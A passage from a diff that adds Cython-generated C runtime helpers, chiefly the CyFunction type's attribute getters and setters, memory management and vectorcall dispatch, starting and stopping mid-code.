PyObject *py_basicsize; + py_basicsize = PyObject_GetAttrString(cached_type, "__basicsize__"); + if (unlikely(!py_basicsize)) goto bad; + basicsize = PyLong_AsSsize_t(py_basicsize); + Py_DECREF(py_basicsize); + py_basicsize = 0; + if (unlikely(basicsize == (Py_ssize_t)-1) && PyErr_Occurred()) goto bad; +#else + basicsize = likely(PyType_Check(cached_type)) ? ((PyTypeObject*) cached_type)->tp_basicsize : -1; +#endif + if (__Pyx_VerifyCachedType( + cached_type, + object_name, + basicsize, + spec->basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + CYTHON_UNUSED_VAR(module); + cached_type = __Pyx_PyType_FromModuleAndSpec(abi_module, spec, bases); + if (unlikely(!cached_type)) goto bad; + if (unlikely(__Pyx_fix_up_extension_type_from_spec(spec, (PyTypeObject *) cached_type) < 0)) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, cached_type) < 0) goto bad; +done: + Py_DECREF(abi_module); + assert(cached_type == NULL || PyType_Check(cached_type)); + return (PyTypeObject *) cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#endif + +/* PyObjectGetAttrStr */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name) { + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro)) + return tp->tp_getattro(obj, attr_name); +#if PY_MAJOR_VERSION < 3 + if (likely(tp->tp_getattr)) + return tp->tp_getattr(obj, PyString_AS_STRING(attr_name)); +#endif + return PyObject_GetAttr(obj, attr_name); +} +#endif + +/* PyVectorcallFastCallDict */ +#if CYTHON_METH_FASTCALL +static PyObject *__Pyx_PyVectorcall_FastCallDict_kw(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + PyObject *res = NULL; + PyObject *kwnames; + PyObject **newargs; + PyObject **kwvalues; + Py_ssize_t i, pos; + size_t j; + PyObject *key, *value; + unsigned long keys_are_strings; + Py_ssize_t nkw = PyDict_GET_SIZE(kw); + newargs = (PyObject **)PyMem_Malloc((nargs + (size_t)nkw) * sizeof(args[0])); + if (unlikely(newargs == NULL)) { + PyErr_NoMemory(); + return NULL; + } + for (j = 0; j < nargs; j++) newargs[j] = args[j]; + kwnames = PyTuple_New(nkw); + if (unlikely(kwnames == NULL)) { + PyMem_Free(newargs); + return NULL; + } + kwvalues = newargs + nargs; + pos = i = 0; + keys_are_strings = Py_TPFLAGS_UNICODE_SUBCLASS; + while (PyDict_Next(kw, &pos, &key, &value)) { + keys_are_strings &= Py_TYPE(key)->tp_flags; + Py_INCREF(key); + Py_INCREF(value); + PyTuple_SET_ITEM(kwnames, i, key); + kwvalues[i] = value; + i++; + } + if (unlikely(!keys_are_strings)) { + PyErr_SetString(PyExc_TypeError, "keywords must be strings"); + goto cleanup; + } + res = vc(func, newargs, nargs, kwnames); +cleanup: + Py_DECREF(kwnames); + for (i = 0; i < nkw; i++) + Py_DECREF(kwvalues[i]); + PyMem_Free(newargs); + return res; +} +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + if (likely(kw == NULL) || PyDict_GET_SIZE(kw) == 0) { + return vc(func, args, nargs, NULL); + } + return __Pyx_PyVectorcall_FastCallDict_kw(func, vc, args, nargs, kw); +} +#endif + +/* CythonFunctionShared */ +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj) { +#if PY_VERSION_HEX < 0x030900B1 + __Pyx_Py_XDECREF_SET( + __Pyx_CyFunction_GetClassObj(f), + ((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#else + __Pyx_Py_XDECREF_SET( + ((PyCMethodObject *) (f))->mm_class, + (PyTypeObject*)((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#endif +} +static PyObject * +__Pyx_CyFunction_get_doc(__pyx_CyFunctionObject *op, void *closure) +{ + CYTHON_UNUSED_VAR(closure); + if (unlikely(op->func_doc == NULL)) { + if (((PyCFunctionObject*)op)->m_ml->ml_doc) { +#if PY_MAJOR_VERSION >= 3 + op->func_doc = PyUnicode_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#else + op->func_doc = PyString_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#endif + if (unlikely(op->func_doc == NULL)) + return NULL; + } else { + Py_INCREF(Py_None); + return Py_None; + } + } + Py_INCREF(op->func_doc); + return op->func_doc; +} +static int +__Pyx_CyFunction_set_doc(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (value == NULL) { + value = Py_None; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_doc, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_name(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_name == NULL)) { +#if PY_MAJOR_VERSION >= 3 + op->func_name = PyUnicode_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#else + op->func_name = PyString_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#endif + if (unlikely(op->func_name == NULL)) + return NULL; + } + Py_INCREF(op->func_name); + return op->func_name; +} +static int +__Pyx_CyFunction_set_name(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__name__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_name, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_qualname(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_qualname); + return op->func_qualname; +} +static int +__Pyx_CyFunction_set_qualname(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__qualname__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_qualname, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_dict(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_dict == NULL)) { + op->func_dict = PyDict_New(); + if (unlikely(op->func_dict == NULL)) + return NULL; + } + Py_INCREF(op->func_dict); + return op->func_dict; +} +static int +__Pyx_CyFunction_set_dict(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(value == NULL)) { + PyErr_SetString(PyExc_TypeError, + "function's dictionary may not be deleted"); + return -1; + } + if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "setting function's dictionary to a non-dict"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_dict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_globals(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_globals); + return op->func_globals; +} +static PyObject * +__Pyx_CyFunction_get_closure(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(op); + CYTHON_UNUSED_VAR(context); + Py_INCREF(Py_None); + return Py_None; +} +static PyObject * +__Pyx_CyFunction_get_code(__pyx_CyFunctionObject *op, void *context) +{ + PyObject* result = (op->func_code) ? op->func_code : Py_None; + CYTHON_UNUSED_VAR(context); + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_init_defaults(__pyx_CyFunctionObject *op) { + int result = 0; + PyObject *res = op->defaults_getter((PyObject *) op); + if (unlikely(!res)) + return -1; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + op->defaults_tuple = PyTuple_GET_ITEM(res, 0); + Py_INCREF(op->defaults_tuple); + op->defaults_kwdict = PyTuple_GET_ITEM(res, 1); + Py_INCREF(op->defaults_kwdict); + #else + op->defaults_tuple = PySequence_ITEM(res, 0); + if (unlikely(!op->defaults_tuple)) result = -1; + else { + op->defaults_kwdict = PySequence_ITEM(res, 1); + if (unlikely(!op->defaults_kwdict)) result = -1; + } + #endif + Py_DECREF(res); + return result; +} +static int +__Pyx_CyFunction_set_defaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyTuple_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__defaults__ must be set to a tuple object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__defaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_tuple, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_defaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_tuple; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_tuple; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_kwdefaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__kwdefaults__ must be set to a dict object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__kwdefaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_kwdict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_kwdefaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_kwdict; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_kwdict; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_annotations(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value || value == Py_None) { + value = NULL; + } else if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__annotations__ must be set to a dict object"); + return -1; + } + Py_XINCREF(value); + __Pyx_Py_XDECREF_SET(op->func_annotations, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_annotations(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->func_annotations; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + result = PyDict_New(); + if (unlikely(!result)) return NULL; + op->func_annotations = result; + } + Py_INCREF(result); + return result; +} +static PyObject * +__Pyx_CyFunction_get_is_coroutine(__pyx_CyFunctionObject *op, void *context) { + int is_coroutine; + CYTHON_UNUSED_VAR(context); + if (op->func_is_coroutine) { + return __Pyx_NewRef(op->func_is_coroutine); + } + is_coroutine = op->flags & __Pyx_CYFUNCTION_COROUTINE; +#if PY_VERSION_HEX >= 0x03050000 + if (is_coroutine) { + PyObject *module, *fromlist, *marker = __pyx_n_s_is_coroutine; + fromlist = PyList_New(1); + if (unlikely(!fromlist)) return NULL; + Py_INCREF(marker); + PyList_SET_ITEM(fromlist, 0, marker); + module = PyImport_ImportModuleLevelObject(__pyx_n_s_asyncio_coroutines, NULL, NULL, fromlist, 0); + Py_DECREF(fromlist); + if (unlikely(!module)) goto ignore; + op->func_is_coroutine = __Pyx_PyObject_GetAttrStr(module, marker); + Py_DECREF(module); + if (likely(op->func_is_coroutine)) { + return __Pyx_NewRef(op->func_is_coroutine); + } +ignore: + PyErr_Clear(); + } +#endif + op->func_is_coroutine = __Pyx_PyBool_FromLong(is_coroutine); + return __Pyx_NewRef(op->func_is_coroutine); +} +static PyGetSetDef __pyx_CyFunction_getsets[] = { + {(char *) "func_doc", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "__doc__", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "func_name", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__name__", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__qualname__", (getter)__Pyx_CyFunction_get_qualname, (setter)__Pyx_CyFunction_set_qualname, 0, 0}, + {(char *) "func_dict", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "__dict__", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "func_globals", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "__globals__", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "func_closure", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "__closure__", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "func_code", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "__code__", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "func_defaults", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__defaults__", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__kwdefaults__", (getter)__Pyx_CyFunction_get_kwdefaults, (setter)__Pyx_CyFunction_set_kwdefaults, 0, 0}, + {(char *) "__annotations__", (getter)__Pyx_CyFunction_get_annotations, (setter)__Pyx_CyFunction_set_annotations, 0, 0}, + {(char *) "_is_coroutine", (getter)__Pyx_CyFunction_get_is_coroutine, 0, 0, 0}, + {0, 0, 0, 0, 0} +}; +static PyMemberDef __pyx_CyFunction_members[] = { + {(char *) "__module__", T_OBJECT, offsetof(PyCFunctionObject, m_module), 0, 0}, +#if CYTHON_USE_TYPE_SPECS + {(char *) "__dictoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_dict), READONLY, 0}, +#if CYTHON_METH_FASTCALL +#if CYTHON_BACKPORT_VECTORCALL + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_vectorcall), READONLY, 0}, +#else + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(PyCFunctionObject, vectorcall), READONLY, 0}, +#endif +#endif +#if PY_VERSION_HEX < 0x030500A0 + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_weakreflist), READONLY, 0}, +#else + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(PyCFunctionObject, m_weakreflist), READONLY, 0}, +#endif +#endif + {0, 0, 0, 0, 0} +}; +static PyObject * +__Pyx_CyFunction_reduce(__pyx_CyFunctionObject *m, PyObject *args) +{ + CYTHON_UNUSED_VAR(args); +#if PY_MAJOR_VERSION >= 3 + Py_INCREF(m->func_qualname); + return m->func_qualname; +#else + return PyString_FromString(((PyCFunctionObject*)m)->m_ml->ml_name); +#endif +} +static PyMethodDef __pyx_CyFunction_methods[] = { + {"__reduce__", (PyCFunction)__Pyx_CyFunction_reduce, METH_VARARGS, 0}, + {0, 0, 0, 0} +}; +#if PY_VERSION_HEX < 0x030500A0 +#define __Pyx_CyFunction_weakreflist(cyfunc) ((cyfunc)->func_weakreflist) +#else +#define __Pyx_CyFunction_weakreflist(cyfunc) (((PyCFunctionObject*)cyfunc)->m_weakreflist) +#endif +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject *op, PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyCFunctionObject *cf = (PyCFunctionObject*) op; + if (unlikely(op == NULL)) + return NULL; + op->flags = flags; + __Pyx_CyFunction_weakreflist(op) = NULL; + cf->m_ml = ml; + cf->m_self = (PyObject *) op; + Py_XINCREF(closure); + op->func_closure = closure; + Py_XINCREF(module); + cf->m_module = module; + op->func_dict = NULL; + op->func_name = NULL; + Py_INCREF(qualname); + op->func_qualname = qualname; + op->func_doc = NULL; +#if PY_VERSION_HEX < 0x030900B1 + op->func_classobj = NULL; +#else + ((PyCMethodObject*)op)->mm_class = NULL; +#endif + op->func_globals = globals; + Py_INCREF(op->func_globals); + Py_XINCREF(code); + op->func_code = code; + op->defaults_pyobjects = 0; + op->defaults_size = 0; + op->defaults = NULL; + op->defaults_tuple = NULL; + op->defaults_kwdict = NULL; + op->defaults_getter = NULL; + op->func_annotations = NULL; + op->func_is_coroutine = NULL; +#if CYTHON_METH_FASTCALL + switch (ml->ml_flags & (METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_METHOD)) { + case METH_NOARGS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_NOARGS; + break; + case METH_O: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_O; + break; + case METH_METHOD | METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD; + break; + case METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS; + break; + case METH_VARARGS | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = NULL; + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + Py_DECREF(op); + return NULL; + } +#endif + return (PyObject *) op; +} +static int +__Pyx_CyFunction_clear(__pyx_CyFunctionObject *m) +{ + Py_CLEAR(m->func_closure); + Py_CLEAR(((PyCFunctionObject*)m)->m_module); + Py_CLEAR(m->func_dict); + Py_CLEAR(m->func_name); + Py_CLEAR(m->func_qualname); + Py_CLEAR(m->func_doc); + Py_CLEAR(m->func_globals); + Py_CLEAR(m->func_code); +#if PY_VERSION_HEX < 0x030900B1 + Py_CLEAR(__Pyx_CyFunction_GetClassObj(m)); +#else + { + PyObject *cls = (PyObject*) ((PyCMethodObject *) (m))->mm_class; + ((PyCMethodObject *) (m))->mm_class = NULL; + Py_XDECREF(cls); + } +#endif + Py_CLEAR(m->defaults_tuple); + Py_CLEAR(m->defaults_kwdict); + Py_CLEAR(m->func_annotations); + Py_CLEAR(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_XDECREF(pydefaults[i]); + PyObject_Free(m->defaults); + m->defaults = NULL; + } + return 0; +} +static void __Pyx__CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + if (__Pyx_CyFunction_weakreflist(m) != NULL) + PyObject_ClearWeakRefs((PyObject *) m); + __Pyx_CyFunction_clear(m); + __Pyx_PyHeapTypeObject_GC_Del(m); +} +static void __Pyx_CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + PyObject_GC_UnTrack(m); + __Pyx__CyFunction_dealloc(m); +} +static int __Pyx_CyFunction_traverse(__pyx_CyFunctionObject *m, visitproc visit, void *arg) +{ + Py_VISIT(m->func_closure); + Py_VISIT(((PyCFunctionObject*)m)->m_module); + Py_VISIT(m->func_dict); + Py_VISIT(m->func_name); + Py_VISIT(m->func_qualname); + Py_VISIT(m->func_doc); + Py_VISIT(m->func_globals); + Py_VISIT(m->func_code); + Py_VISIT(__Pyx_CyFunction_GetClassObj(m)); + Py_VISIT(m->defaults_tuple); + Py_VISIT(m->defaults_kwdict); + Py_VISIT(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_VISIT(pydefaults[i]); + } + return 0; +} +static PyObject* +__Pyx_CyFunction_repr(__pyx_CyFunctionObject *op) +{ +#if PY_MAJOR_VERSION >= 3 + return PyUnicode_FromFormat("", + op->func_qualname, (void *)op); +#else + return PyString_FromFormat("", + PyString_AsString(op->func_qualname), (void *)op); +#endif +} +static PyObject * __Pyx_CyFunction_CallMethod(PyObject *func, PyObject *self, PyObject *arg, PyObject *kw) { + PyCFunctionObject* f = (PyCFunctionObject*)func; + PyCFunction meth = f->m_ml->ml_meth; + Py_ssize_t size; + switch (f->m_ml->ml_flags & (METH_VARARGS | METH_KEYWORDS | METH_NOARGS | METH_O)) { + case METH_VARARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) + return (*meth)(self, arg); + break; + case METH_VARARGS | METH_KEYWORDS: + return (*(PyCFunctionWithKeywords)(void*)meth)(self, arg, kw); + case METH_NOARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 0)) + return (*meth)(self, NULL); + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + case METH_O: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 1)) { + PyObject *result, *arg0; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + arg0 = PyTuple_GET_ITEM(arg, 0); + #else + arg0 = PySequence_ITEM(arg, 0); if (unlikely(!arg0)) return NULL; + #endif + result = (*meth)(self, arg0); + #if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(arg0); + #endif + return result; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + return NULL; + } + PyErr_Format(PyExc_TypeError, "%.200s() takes no keyword arguments", + f->m_ml->ml_name); + return NULL; +} +static CYTHON_INLINE PyObject *__Pyx_CyFunction_Call(PyObject *func, PyObject *arg, PyObject *kw) { + return __Pyx_CyFunction_CallMethod(func, ((PyCFunctionObject*)func)->m_self, arg, kw); +} +static PyObject *__Pyx_CyFunction_CallAsMethod(PyObject *func, PyObject *args, PyObject *kw) { + PyObject *result; + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *) func; +#if CYTHON_METH_FASTCALL + __pyx_vectorcallfunc vc = __Pyx_CyFunction_func_vectorcall(cyfunc); + if (vc) { +#if CYTHON_ASSUME_SAFE_MACROS + return __Pyx_PyVectorcall_FastCallDict(func, vc, &PyTuple_GET_ITEM(args, 0), (size_t)PyTuple_GET_SIZE(args), kw); +#else + (void) &__Pyx_PyVectorcall_FastCallDict; + return PyVectorcall_Call(func, args, kw); +#endif + } +#endif + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + Py_ssize_t argc; + PyObject *new_args; + PyObject *self; + argc = PyTuple_GET_SIZE(args); + new_args = PyTuple_GetSlice(args, 1, argc); + if (unlikely(!new_args)) + return NULL; + self = PyTuple_GetItem(args, 0); + if (unlikely(!self)) { + Py_DECREF(new_args); +#if PY_MAJOR_VERSION > 2 + PyErr_Format(PyExc_TypeError, + "unbound method %.200S() needs an argument", + cyfunc->func_qualname); +#else + PyErr_SetString(PyExc_TypeError, + "unbound method needs an argument"); +#endif + return NULL; + } + result = __Pyx_CyFunction_CallMethod(func, self, new_args, kw); + Py_DECREF(new_args); + } else { + result = __Pyx_CyFunction_Call(func, args, kw); + } + return result; +} +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE int __Pyx_CyFunction_Vectorcall_CheckArgs(__pyx_CyFunctionObject *cyfunc, Py_ssize_t nargs, PyObject *kwnames) +{ + int ret = 0; + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + if (unlikely(nargs < 1)) { + PyErr_Format(PyExc_TypeError, "%.200s() needs an argument", + ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + ret = 1; + } + if (unlikely(kwnames) && unlikely(PyTuple_GET_SIZE(kwnames))) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no keyword arguments", ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + return ret; +} +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 0)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, NULL); +} +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 1)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, args[0]); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((_PyCFunctionFastWithKeywords)(void(*)(void))def->ml_meth)(self, args, nargs, kwnames); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; + PyTypeObject *cls = (PyTypeObject *) __Pyx_CyFunction_GetClassObj(cyfunc); +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((__Pyx_PyCMethod)(void(*)(void))def->ml_meth)(self, cls, args, (size_t)nargs, kwnames); +} +#endif +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_CyFunctionType_slots[] = { + {Py_tp_dealloc, (void *)__Pyx_CyFunction_dealloc}, + {Py_tp_repr, (void *)__Pyx_CyFunction_repr}, + {Py_tp_call, (void *)__Pyx_CyFunction_CallAsMethod}, + {Py_tp_traverse, (void *)__Pyx_CyFunction_traverse}, + {Py_tp_clear, (void *)__Pyx_CyFunction_clear}, + {Py_tp_methods, (void *)__pyx_CyFunction_methods}, + {Py_tp_members, (void *)__pyx_CyFunction_members}, + {Py_tp_getset, (void *)__pyx_CyFunction_getsets}, + {Py_tp_descr_get, (void *)__Pyx_PyMethod_New}, + {0, 0}, +}; +static PyType_Spec __pyx_CyFunctionType_spec = { + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, +#ifdef 